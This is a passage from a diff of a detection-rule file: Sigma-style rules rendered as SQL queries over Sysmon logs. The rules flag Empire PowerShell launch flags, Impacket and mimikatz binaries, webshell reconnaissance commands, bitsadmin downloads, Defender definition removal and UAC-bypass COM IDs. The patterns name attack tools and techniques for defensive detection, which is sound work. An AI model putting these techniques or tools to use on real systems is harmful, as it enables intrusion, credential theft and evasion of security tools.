'%MD5=AE8ACF66BFE3A44148964048B826D005%' ESCAPE '\\' OR Hashes LIKE '%SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856%' ESCAPE '\\') OR md5 = 'ae8acf66bfe3a44148964048b826d005' OR sha1 = 'cea49e9b9b67f3a13ad0be1c2655293ea3c18181' OR sha256 = '5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName = 'esentutl.exe') AND (CommandLine LIKE '%/r%' ESCAPE '\\' OR CommandLine LIKE '%-r%' ESCAPE '\\') AND CommandLine LIKE '%\\\\Windows\\\\WebCache%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_nps.yml" + "filename": "proc_creation_win_esentutl_webcache.yml" }, { - "title": "Suspicious Modification Of Scheduled Tasks", - "id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", + "title": "Script Event Consumer Spawning Process", + "id": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", "status": "experimental", - "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", + "author": "Sittikorn S", "tags": [ "attack.execution", - "attack.t1053.005" + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /Change %' ESCAPE '\\' AND CommandLine LIKE '% /TN %' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\') AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%bash.exe%' ESCAPE '\\' OR CommandLine LIKE '%bash %' ESCAPE '\\' OR CommandLine LIKE '%scrcons%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%forfiles%' ESCAPE '\\' OR CommandLine LIKE '%scriptrunner%' ESCAPE '\\' OR CommandLine LIKE '%hh.exe%' ESCAPE '\\' OR CommandLine LIKE '%hh %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_change.yml" + "filename": "proc_creation_win_scrcons_susp_child_process.yml" }, { - "title": "Execution via stordiag.exe", - "id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", + "title": "HackTool - Empire PowerShell Launch Parameters", + "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", "status": "test", - "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", - "author": "Austin Songer (@austinsonger)", + "description": "Detects suspicious powershell command line parameters used in Empire", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of stordiag.exe." + "Other tools that incidentally use the same command line parameters" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\stordiag.exe' ESCAPE '\\' AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\fltmc.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'c:\\\\windows\\\\system32\\\\%' ESCAPE '\\' OR ParentImage LIKE 'c:\\\\windows\\\\syswow64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -NoP -sta -NonI -W Hidden -Enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc %' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -W Hidden -enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc%' ESCAPE '\\' OR CommandLine LIKE '% -enc SQB%' ESCAPE '\\' OR CommandLine LIKE '% -nop -exec bypass -EncodedCommand %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_stordiag_susp_child_process.yml" + "filename": "proc_creation_win_hktl_empire_powershell_launch.yml" }, { - "title": "Gpg4Win Decrypt Files From Suspicious Locations", - "id": "e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", + "title": "Suspicious MsiExec Embedding Parent", + "id": "4a2a2c3e-209f-4d01-b513-4155a540b469", "status": "experimental", - "description": "Detects usage of the Gpg4win to decrypt files located in suspicious locations from CLI", - "author": "Nasreddine Bencherchali (Nextron Systems), X__Junior", + "description": "Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.t1218.007", + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\gpg2.exe' ESCAPE '\\' OR Product = 'GNU Privacy Guard (GnuPG)' OR Company = 'g10 Code GmbH') AND CommandLine LIKE '%-passphrase%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%MsiExec.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%-Embedding %' ESCAPE '\\') AND NOT ((Image LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\bin\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\MsiExec.exe -Embedding %' ESCAPE '\\' AND ParentCommandLine LIKE '%Global\\\\MSI0000%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_gpg4win_susp_usage.yml" + "filename": "proc_creation_win_msiexec_embedding.yml" }, { - "title": "Elise Backdoor Activity", - "id": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "title": "HackTool - Impacket Tools Execution", + "id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", "status": "test", - "description": "Detects Elise backdoor activity used by APT32", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.g0030", - "attack.g0050", - "attack.s0081", "attack.execution", - "attack.t1059.003" + "attack.t1557.001" ], "falsepositives": [ - "Unlikely" + "Legitimate use of the impacket tools" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Microsoft\\\\Network\\\\svchost.exe' ESCAPE '\\' OR (CommandLine LIKE '%\\\\Windows\\\\Caches\\\\NavShExt.dll%' ESCAPE '\\' AND CommandLine LIKE '%/c del%' ESCAPE '\\')) OR ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\MICROS~1\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\') AND CommandLine LIKE '%,Setting%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\goldenPac%' ESCAPE '\\' OR Image LIKE '%\\\\karmaSMB%' ESCAPE '\\' OR Image LIKE '%\\\\kintercept%' ESCAPE '\\' OR Image LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\rpcdump%' ESCAPE '\\' OR Image LIKE '%\\\\samrdump%' ESCAPE '\\' OR Image LIKE '%\\\\secretsdump%' ESCAPE '\\' OR Image LIKE '%\\\\smbexec%' ESCAPE '\\' OR Image LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\wmiexec%' ESCAPE '\\' OR Image LIKE '%\\\\wmipersist%' ESCAPE '\\') OR (Image LIKE '%\\\\atexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\dcomexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\dpapi\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\findDelegation\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetADUsers\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetNPUsers\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getPac\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getST\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getTGT\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetUserSPNs\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\ifmap\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\mimikatz\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\netview\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\nmapAnswerMachine\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\opdump\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\rdp\\_check\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sambaPipe\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\smbclient\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\smbserver\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sniffer\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sniff\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\split\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\ticketer\\_windows.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_elise.yml" + "filename": "proc_creation_win_hktl_impacket_tools.yml" }, { - "title": "CMSTP UAC Bypass via COM Object Access", - "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", - "status": "stable", - "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", - "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", + "title": "Webshell Detection With Command Line Keywords", + "id": "bed2a484-9348-4143-8a8a-b801c979301c", + "status": "experimental", + "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND (ParentCommandLine LIKE '% /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((OriginalFileName IN ('net.exe', 'net1.exe') AND (CommandLine LIKE '% user %' ESCAPE '\\' OR CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% group %' ESCAPE '\\')) OR (OriginalFileName = 'ping.exe' AND CommandLine LIKE '% -n %' ESCAPE '\\') OR (CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%cd /d %' ESCAPE '\\') OR (OriginalFileName = 'wmic.exe' AND CommandLine LIKE '% /node:%' ESCAPE '\\') OR ((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\quser.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\pathping.exe' ESCAPE '\\' OR Image LIKE '%\\\\tracert.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\') OR OriginalFileName IN ('whoami.exe', 'sysinfo.exe', 'quser.exe', 'ipconfig.exe', 'pathping.exe', 'tracert.exe', 'netstat.exe', 'schtasks.exe', 'VSSADMIN.EXE', 'wevtutil.exe', 'tasklist.exe')) OR (CommandLine LIKE '% Test-NetConnection %' ESCAPE '\\' OR CommandLine LIKE '%dir \\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml" + "filename": "proc_creation_win_webshell_detection.yml" }, { - "title": "Rundll32 JS RunHTMLApplication Pattern", - "id": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + "title": "Windows Defender Definition Files Removed", + "id": "9719a8aa-401c-41af-8108-ced7ec9cd75c", "status": "test", - "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%javascript%' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\mshtml,RunHTMLApplication%' ESCAPE '\\') OR CommandLine LIKE '%;document.write();GetObject(\"script%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR OriginalFileName = 'MpCmdRun.exe') AND (CommandLine LIKE '% -RemoveDefinitions%' ESCAPE '\\' AND CommandLine LIKE '% -All%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_js_runhtmlapplication.yml" + "filename": "proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml" }, { - "title": "Suspicious Whoami.EXE Execution From Privileged Process", - "id": "79ce34ca-af29-4d0e-b832-fc1b377020db", - "status": "experimental", - "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", + "title": "PUA - AdFind Suspicious Execution", + "id": "9a132afa-654e-11eb-ae93-0242ac130002", + "status": "test", + "description": "Detects AdFind execution with common flags seen used during attacks", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", "tags": [ - "attack.privilege_escalation", "attack.discovery", - "attack.t1033" + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" ], "falsepositives": [ - "Unknown" + "Legitimate admin activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'whoami.exe' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\' OR User LIKE '%TrustedInstaller%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml" + "filename": "proc_creation_win_pua_adfind_susp_usage.yml" }, { - "title": "Renamed Mavinject.EXE Execution", - "id": "e6474a1b-5390-49cd-ab41-8d88655f7394", + "title": "Lolbin Ssh.exe Use As Proxy", + "id": "7d6d30b8-5b91-4b90-a891-46cccaf29598", "status": "experimental", - "description": "Detects the execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", - "author": "frack113, Florian Roth", + "description": "Detect usage of the \"ssh.exe\" binary as a proxy to launch other programs", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" + "attack.t1202" ], "falsepositives": [ - "Unlikely" + "Legitimate usage for administration purposes" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName IN ('mavinject32.exe', 'mavinject64.exe') AND NOT ((Image LIKE '%\\\\mavinject32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mavinject64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\OpenSSH\\\\sshd.exe' ESCAPE '\\' OR (Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND (CommandLine LIKE '%ProxyCommand=%' ESCAPE '\\' OR (CommandLine LIKE '%PermitLocalCommand%' ESCAPE '\\' AND CommandLine LIKE '%LocalCommand%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_renamed_mavinject.yml" + "filename": "proc_creation_win_lolbin_ssh.yml" }, { - "title": "File Download Via Bitsadmin", - "id": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede", + "title": "LOLBIN From Abnormal Drive", + "id": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", "status": "test", - "description": "Detects usage of bitsadmin downloading a file", - "author": "Michael Haag, FPT.EagleEye", + "description": "Detects LOLBINs executing from an abnormal drive such as a mounted ISO.", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Angelo Violetti - SEC Consult '@angelo_violetti'", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.defense_evasion" ], "falsepositives": [ - "Some legitimate apps use this, but limited." + "Rare false positives could occur on servers with multiple drives." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR ((CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'CALC.EXE', 'MSHTA.EXE', 'cscript.exe', 'wscript.exe', 'REGSVR32.EXE', 'installutil.exe', 'CMSTP.EXE')) AND NOT ((CurrentDirectory LIKE '%C:\\\\%' ESCAPE '\\') OR (CurrentDirectory = '') OR (CurrentDirectory = '')))" ], - "filename": "proc_creation_win_bitsadmin_download.yml" + "filename": "proc_creation_win_lolbin_not_from_c_drive.yml" }, { - "title": "Suspicious Call by Ordinal", - "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", - "status": "stable", - "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", - "author": "Florian Roth (Nextron Systems)", + "title": "Port Forwarding Attempt Via SSH", + "id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", + "status": "experimental", + "description": "Detects suspicious SSH tunnel port forwarding to a local port", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1572", + "attack.t1021.001", + "attack.t1021.004" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment", - "Windows control panel elements have been identified as source (mmc)" + "Administrative activity using a remote port forwarding to a local port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,#%' ESCAPE '\\' OR CommandLine LIKE '%, #%' ESCAPE '\\' OR CommandLine LIKE '%.dll #%' ESCAPE '\\' OR CommandLine LIKE '%.ocx #%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%EDGEHTML.dll%' ESCAPE '\\' AND CommandLine LIKE '%#141%' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Tracker.exe%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\FileTracker32.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker32.dll\",#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll\",#1%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_by_ordinal.yml" + "filename": "proc_creation_win_ssh_port_forward.yml" }, { - "title": "Copy from Admin Share", - "id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", - "status": "test", - "description": "Detects a suspicious copy command to or from an Admin share or remote", - "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", + "title": "Use Short Name Path in Command Line", + "id": "349d891d-fef0-4fe4-bc53-eee623a15969", + "status": "experimental", + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.lateral_movement", - "attack.collection", - "attack.exfiltration", - "attack.t1039", - "attack.t1048", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Administrative scripts" + "Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process." ], 